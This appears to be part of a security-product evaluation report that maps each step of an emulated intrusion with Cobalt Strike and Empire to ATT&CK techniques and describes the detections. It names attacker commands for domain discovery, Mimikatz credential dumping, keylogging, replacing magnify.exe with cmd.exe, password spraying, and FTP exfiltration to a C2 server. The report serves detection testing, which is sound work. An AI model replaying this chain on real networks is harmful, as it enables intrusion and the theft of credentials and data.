Enrichment of reg.exe executing with command-line arguments as the terminal server key queried by the reg utility (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments with a related ATT&CK Technique (System Service Discovery).
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing takeown with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment (Tainted)
  
 
The capability enriched takeown.exe executing with command-line arguments as changing permission or ownership of a file or folder. The data was tainted by a parent alert on cmd.exe.
Enrichment
  
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification).
Telemetry showing powershell.exe executing takeown with command-line arguments (tainted by a parent alert on cmd.exe)
Enrichment of takeown.exe executing with command-line arguments as changing permission or ownership of a file or folder (tainted by a parent alert on cmd.exe)
Enrichment of takeown.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification).
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing icalcs with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment
  
The capability enriched icalcs.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification).
Telemetry showing powershell.exe executing icacls with command-line arguments (tainted by a parent alert on cmd.exe)
Enrichment of icacls.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification).
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
  
 
Telemetry showed file write events overwriting magnify.exe in the system directory as well as the change in the hash of the file. The telemetry was tainted by a parent alert on cmd.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing file write events overwriting magnify.exe in the system directory (tainted by a parent alert on cmd.exe)
Telemetry showing change in the hash of magnify.exe
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed an event with the execution of the Get-ChildItem command. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing an event with the execution of the Get-ChildItem command (tainted by a parent alert on wscript.exe)
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry (Tainted)
  
 
Telemetry showed file read and write events for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) to the Recycle Bin. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing file read and write events for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) to the Recycle Bin (tainted by a parent alert on wscript.exe)
Data from Network Shared Drive
(T1039)
Telemetry (Tainted)
  
 
Telemetry showed a file read event for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker). The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a script engine reading files from network locations. The alert was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing a file event for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) (tainted by a parent alert on wscript.exe)
Specific Behavior alert for a script engine reading files from network locations (tainted by a parent alert on wscript.exe)
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed the MD5 and SHA256 hash values of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing file create/write and hash values of recycler.exe (tainted by a parent alert on wscript.exe)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file create and write events for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for PowerShell dropping an executable file to disk. The alert was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for executables created to disk by the Windows scripting engine. The alert was tainted by a parent alert on wscript.exe.
Telemetry showing the file create and write events for recycler.exe (tainted by a parent alert on wscript.exe)
General Behavior alert for PowerShell dropping an executable file to disk (tainted by a parent alert on wscript.exe)
General Behavior alert for executables created to disk by the Windows scripting engine (tainted by a parent alert on wscript.exe)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe
Telemetry showing recycler.exe execution (tainted by a parent alert on wscript.exe)
Data Encrypted
(T1022)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine
Telemetry showing recycler.exe execution (tainted by a parent alert on wscript.exe)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe
Enrichment
  
The capability enriched recylcer.exe executing with command-line arguments with a related ATT&CK Technique (Masquerading).
Telemetry showing recycler.exe execution (tainted by a parent alert on wscript.exe)
Enrichment of recylcer.exe executing with command-line arguments with a related ATT&CK Technique (Masquerading)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Telemetry (Tainted)
  
 
Telemetry showed the execution of ftp.exe and command-line arguments as well as a an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
  
 
The capability enriched ftp.exe as the execution of a CLI file transfer/copy utility. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing ftp.exe execution (tainted by a parent alert on wscript.exe)
Telemetry showing an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21 (tainted by a parent alert on wscript.exe)
Enrichment of ftp.exe as the execution of a CLI file transfer/copy utility (tainted by a parent alert on wscript.exe)
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry (Tainted)
  
 
Telemetry showed the file delete event for old.rar. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing the file delete event for old.rar (tainted by a parent alert on wscript.exe)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Telemetry (Tainted)
  
 
Telemetry showed the file delete event for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing the file delete event for recycler.exe (tainted by a parent alert on wscript.exe)
20.A.1
magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Telemetry
  
Telemetry showed magnify.exe executing from utilman.exe.
Telemetry showing magnify.exe executing from utilman.exe
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed an inbound connection to Creeper (10.0.0.4) on port 3389.
Telemetry showing an inbound connection to Creeper (10.0.0.4) on port 3389
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry
  
Telemetry showed magnify.exe executing whoami.exe.
Enrichment
  
The capability enriched whoami.exe executing as an enumeration command.
Telemetry showing magnify.exe executing whoami.exe
Enrichment of whoami.exe executing as an enumeration command







Operational Flow The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discover

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discover

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)